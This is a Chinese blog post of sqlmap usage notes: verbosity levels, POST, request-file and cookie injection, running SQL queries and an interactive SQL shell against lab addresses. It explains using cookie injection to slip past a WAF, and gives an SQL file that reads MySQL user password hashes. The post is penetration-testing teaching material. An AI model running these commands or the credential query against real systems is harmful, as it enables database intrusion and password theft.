sqlmap

-v

如果你想观察sqlmap对一个点是进行了怎样的尝试判断以及读取数据的,可以使用 -v 参数。
共有七个等级,默认为1:
0、只显示python错误以及严重的信息。
1、同时显示基本信息和警告信息。(默认)
2、同时显示debug信息。
3、同时显示注入的payload。
4、同时显示HTTP请求。
5、同时显示HTTP响应头。
6、同时显示HTTP响应页面

指定数据库类型
  • 因为已经知道数据库名为微软的 sql server,为了加快检测速度,指定数据库参数 --dbms=mssql
post 注入:
python sqlmap.py -u “http://172.16.12.2/loginAuth.php" --method POST --data "id=1&passwd=123456" -p id
抓包注入:
python sqlmap.py -r c:/post.txt
cookie注入:

cookie注入原理:

php:使用超全局变 $_GET,$_POST来接受参数。 
asp:使用 Request.QueryString (GET)或 Request.Form (POST)来接收页面提交参数值。

有些程序员 较懒,直接这么写:

$id = $_REQUEST['id'];

这时候PHP不知道,从get 还是post方式上接收参数 ,它就会一个一个去试!,它是先取GET中的数据,没有再取POST中的数据,还会去取Cookies中的数据。 程序员还会写waf,可是他的waf可能是检测get和post的数据 但是没有检测cookie。 因此,我们只需要把数据放在cookie,就可以绕过waf的检测而且服务也可以正常接收。 这就是中转注入的原理。

默认情况下SQLmap只支持GET/POST参数的注入测试,但是当使用--level 参数且数值>=2的时候也会检查cookie时面的参数,当>=3的时候将检查User-agent和Referer。 那么这就很简单了,我们直接在原有的基础上面加上--level 2 即可验证cookie。

python sqlmap.py -u "http://172.16.12.2/test.php" --cookie "id=1" --level 2
sqlmap执行指定的sql语句:

--sql-query=QUERY

python sqlmap.py -u "http://172.16.12.2/inject.php?id=1" --sql-query="select @@version"
查询数据库版本
sqlmap交互式的sql命令

--sql-shell

python sqlmap.py -u "http://172.16.12.2/inject.php?id=1" --sql-shell

select @@datadir是查询当前数据库文件存放路径的语句

sqlmap执行文件中的sql语句

--sql-file=sql文件
在c盘下新建1.sql内容如下:

select version(); //查询数据库版本
select @@basedir;  //查询数据库存放路径
select password from mysql.user;  //查询MySQL用户密码

sqlmap中执行

python sqlmap.py -u "http://172.16.12.2/inject.php?id=1" --sql-file=c:/1.sql


  • --batch --risk 3

--batch不用按“yes", --risk 3 所有payload都会执行

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

相关阅读更多精彩内容

  • http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 当给sq...
    xuningbo阅读 13,545评论 2 22
  • sqlmap用户手册 说明:本文为转载,对原文中一些明显的拼写错误进行修正,并标注对自己有用的信息。 ======...
    wind_飘阅读 6,406评论 0 5
  • SQLMAP作用 判断可注入的参数 判断可以用哪种SQL注入技术来注入 识别出哪种数据库 根据用户选择,读取哪些数...
    陆洒脱阅读 9,113评论 1 4
  • Spring Cloud为开发人员提供了快速构建分布式系统中一些常见模式的工具(例如配置管理,服务发现,断路器,智...
    卡卡罗2017阅读 136,260评论 19 139
  • sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工...
    linkally阅读 11,914评论 1 40

友情链接更多精彩内容